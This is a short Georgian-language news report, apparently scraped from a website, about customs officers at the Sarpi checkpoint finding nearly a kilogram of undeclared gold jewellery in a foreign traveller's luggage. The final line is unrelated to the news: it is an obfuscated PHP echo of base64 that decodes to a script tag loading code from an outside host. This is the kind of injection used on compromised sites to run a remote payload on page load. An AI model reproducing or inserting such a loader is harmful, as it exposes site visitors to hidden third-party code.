celsiusi
ავერსი საქკაბელი
სარფის საბაჟო გამშვებ პუნქტზე 1 კილოგრამამდე არადეკლარირებული ოქროს საიუველირო ნაკეთობები გამოავლინეს, - ამის შესახებ შემოსავლების სამსახურის განცხადებაშია აღნიშნული.
"ფინანსთა სამინისტროს შემოსავლების სამსახურის მებაჟე ოფიცრების მიერ, საბაჟო გამშვებ პუნქტზე „სარფი“, ეჭვის საფუძველზე, უცხო ქვეყნის მოქალაქის, ლ.მ.-ს ხელბარგის დეტალური დათვალიერების შედეგად, არადეკლარირებული 926.52 გრამი ოქროს საიუველირო ნაკეთობები გამოვლინდა.
სავალდებულო დეკლარირებას დაქვემდებარებული, ექსპერტების მიერ შეფასებული, საქონლის საერთო საბაჟო ღირებულებამ 73 367.24 ლარი შეადგინა.
საქმის მასალები, შემდგომი რეაგირების მიზნით, ფინანსთა სამინისტროს საგამოძიებო სამსახურს გადაეგზავნა", - ნათქვამია შემოსავლების სამსახურის განცხადებაში. 
351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");